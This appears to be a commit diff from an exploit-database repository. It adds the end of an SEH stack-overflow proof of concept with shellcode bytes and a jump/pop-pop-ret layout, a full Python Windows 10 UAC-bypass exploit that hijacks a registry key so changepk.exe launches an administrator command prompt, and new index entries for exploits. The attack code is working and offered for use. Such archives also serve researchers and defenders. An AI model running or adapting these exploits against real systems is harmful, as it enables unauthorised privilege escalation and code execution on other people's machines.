|
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
|
||||||
|
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
|
||||||
|
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
|
||||||
|
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
|
||||||
|
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"
|
||||||
|
|
||||||
|
poc = ""
|
||||||
|
poc += "A"*nseh_offset
|
||||||
|
poc += "\xEB\x0b\x90\x90" # jmp forward (nseh)
|
||||||
|
poc += "\x11\x7b\x03\x10" # pop pop ret (seh)
|
||||||
|
poc += "\x90"*20
|
||||||
|
poc += shellcode_calc
|
||||||
|
poc += "D"*(total - len(poc))
|
||||||
|
|
||||||
|
file = open("poc_seh.txt","w")
|
||||||
|
file.write(poc)
|
||||||
|
file.close()
|
97
exploits/windows/local/47915.py
Executable file
97
exploits/windows/local/47915.py
Executable file
|
@ -0,0 +1,97 @@
|
||||||
|
# Exploit Title: Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)
|
||||||
|
# Author: Nassim Asrir
|
||||||
|
# Date: 2019-01-10
|
||||||
|
# Exploit Author: Nassim Asrir
|
||||||
|
# CVE: N/A
|
||||||
|
# Tested On: Windows 10Pro 1809
|
||||||
|
# Vendor : https://www.microsoft.com
|
||||||
|
|
||||||
|
# Technical Details
|
||||||
|
|
||||||
|
# I discovered a Local Privilege Escalation in Windows 10 (UAC Bypass), via an auto-elevated process.
|
||||||
|
# The executable is changepk.exe. changepk is used to pass a new product key, you can pass the key also via commandline.
|
||||||
|
# By executing changepk.exe and tracing the process we can see some RegOpenKey operations that lead to open some non-found Key in the registry (HKCU).
|
||||||
|
# In our case we can use "HKCU:\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" to spawn our Administrator cmd or to bypass the mmc UAC.
|
||||||
|
|
||||||
|
# ntoskrnl.exe ObOpenObjectByNameEx + 0x32db 0xfffff8073106270b C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntoskrnl.exe RtlMapGenericMask + 0x2548 0xfffff80731090118 C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntoskrnl.exe ObOpenObjectByNameEx + 0x1bd9 0xfffff80731061009 C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntoskrnl.exe ObOpenObjectByNameEx + 0x1df 0xfffff8073105f60f C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntoskrnl.exe SeCaptureSubjectContextEx + 0x7c8 0xfffff8073105dc98 C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntoskrnl.exe SeCaptureSubjectContextEx + 0x51f 0xfffff8073105d9ef C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntoskrnl.exe setjmpex + 0x78e5 0xfffff80730bd9c05 C:\WINDOWS\system32\ntoskrnl.exe
|
||||||
|
# ntdll.dll ZwOpenKeyEx + 0x14 0x7ff877501a94 C:\Windows\System32\ntdll.dll
|
||||||
|
# KernelBase.dll RegEnumKeyExW + 0x4c5 0x7ff874161655 C:\Windows\System32\KernelBase.dll
|
||||||
|
# KernelBase.dll MapPredefinedHandleInternal + 0xca5 0x7ff874162fb5 C:\Windows\System32\KernelBase.dll
|
||||||
|
# KernelBase.dll RegOpenKeyExInternalW + 0x141 0x7ff874161fa1 C:\Windows\System32\KernelBase.dll
|
||||||
|
# KernelBase.dll RegOpenKeyExW + 0x19 0x7ff874161e49 C:\Windows\System32\KernelBase.dll
|
||||||
|
# SHCore.dll SHGetValueW + 0x8c 0x7ff87469bfcc C:\Windows\System32\SHCore.dll
|
||||||
|
# shell32.dll Ordinal790 + 0xb282 0x7ff87532fd22 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll Ordinal790 + 0xad56 0x7ff87532f7f6 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll SHChangeNotification_Lock + 0x2b8 0x7ff8753a2a58 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll Ordinal790 + 0xb0cb 0x7ff87532fb6b C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll Ordinal790 + 0xa254 0x7ff87532ecf4 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll Ordinal790 + 0xa7c6 0x7ff87532f266 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll Shell_NotifyIconW + 0x1695 0x7ff875349c75 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll SHGetFileInfoW + 0x18a5 0x7ff87536a8c5 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll SignalFileOpen + 0x33b 0x7ff8753a140b C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll SignalFileOpen + 0x25b 0x7ff8753a132b C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll Ordinal99 + 0x9c6 0x7ff87534ff96 C:\Windows\System32\shell32.dll
|
||||||
|
# shell32.dll SHGetSpecialFolderLocation + 0x28e 0x7ff8753bac5e C:\Windows\System32\shell32.dll
|
||||||
|
# SHCore.dll Ordinal233 + 0x3c5 0x7ff8746ac315 C:\Windows\System32\SHCore.dll
|
||||||
|
# kernel32.dll BaseThreadInitThunk + 0x14 0x7ff875087974 C:\Windows\System32\kernel32.dll
|
||||||
|
# ntdll.dll RtlUserThreadStart + 0x21 0x7ff8774ca271 C:\Windows\System32\ntdll.dll
|
||||||
|
|
||||||
|
|
||||||
|
# Exploit
|
||||||
|
# To exploit the vulnerability you can use this python code then execute it and you will get the Windows Activation just click Yes and you will redirect the execution to cmd.exe.
|
||||||
|
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import ctypes
|
||||||
|
import _winreg
|
||||||
|
import time
|
||||||
|
|
||||||
|
print "Creating Registry Key ....."
|
||||||
|
print ""
|
||||||
|
time.sleep(3)
|
||||||
|
def create_reg_key(key, value):
|
||||||
|
|
||||||
|
try:
|
||||||
|
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command')
|
||||||
|
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command', 0, _winreg.KEY_WRITE)
|
||||||
|
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
|
||||||
|
_winreg.CloseKey(registry_key)
|
||||||
|
except WindowsError:
|
||||||
|
raise
|
||||||
|
|
||||||
|
print "Registry Key Created :)"
|
||||||
|
print ""
|
||||||
|
print "Inserting the command ...."
|
||||||
|
time.sleep(3)
|
||||||
|
print ""
|
||||||
|
def exec_bypass_uac(cmd):
|
||||||
|
try:
|
||||||
|
create_reg_key('DelegateExecute', '')
|
||||||
|
create_reg_key(None, cmd)
|
||||||
|
except WindowsError:
|
||||||
|
raise
|
||||||
|
|
||||||
|
def bypass_uac():
|
||||||
|
try:
|
||||||
|
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
|
||||||
|
cmd = "C:\windows\System32\cmd.exe"
|
||||||
|
exec_bypass_uac(cmd)
|
||||||
|
os.system(r'C:\windows\system32\changepk.exe')
|
||||||
|
return 1
|
||||||
|
except WindowsError:
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
|
||||||
|
if bypass_uac():
|
||||||
|
print "Good job you got your Administrator cmd :)"
|
||||||
|
|
||||||
|
|
||||||
|
# Don't Fogot: reg delete "HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" /f
|
|
@ -6648,6 +6648,12 @@ id,file,description,date,author,type,platform,port
|
||||||
47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
|
47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
|
||||||
47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
|
47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
|
||||||
47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows,
|
47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows,
|
||||||
|
47904,exploits/windows/dos/47904.py,"SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
|
||||||
|
47906,exploits/windows/dos/47906.py,"SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
|
||||||
|
47907,exploits/windows/dos/47907.py,"Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)",2020-01-13,antonio,dos,windows,
|
||||||
|
47909,exploits/windows/dos/47909.py,"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
|
||||||
|
47911,exploits/windows/dos/47911.py,"TaskCanvas 1.4.0 - 'Registration' Denial Of Service",2020-01-13,"Ismail Tasdelen",dos,windows,
|
||||||
|
47912,exploits/windows/dos/47912.py,"Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)",2020-01-13,antonio,dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -10888,6 +10894,10 @@ id,file,description,date,author,type,platform,port
|
||||||
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
|
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
|
||||||
47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
|
47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
|
||||||
47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
|
47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
|
||||||
|
47905,exploits/windows/local/47905.txt,"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions",2020-01-13,ZwX,local,windows,
|
||||||
|
47908,exploits/windows/local/47908.py,"Allok Video Converter 4.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
|
||||||
|
47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
|
||||||
|
47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -42203,3 +42213,6 @@ id,file,description,date,author,type,platform,port
|
||||||
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
|
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
|
||||||
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
|
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
|
||||||
47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,
|
47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,
|
||||||
|
47903,exploits/php/webapps/47903.py,"Chevereto 3.13.4 Core - Remote Code Execution",2020-01-13,"Jinny Ramsmark",webapps,php,
|
||||||
|
47913,exploits/multiple/webapps/47913.rb,"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)",2020-01-13,mekhalleh,webapps,multiple,
|
||||||
|
47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue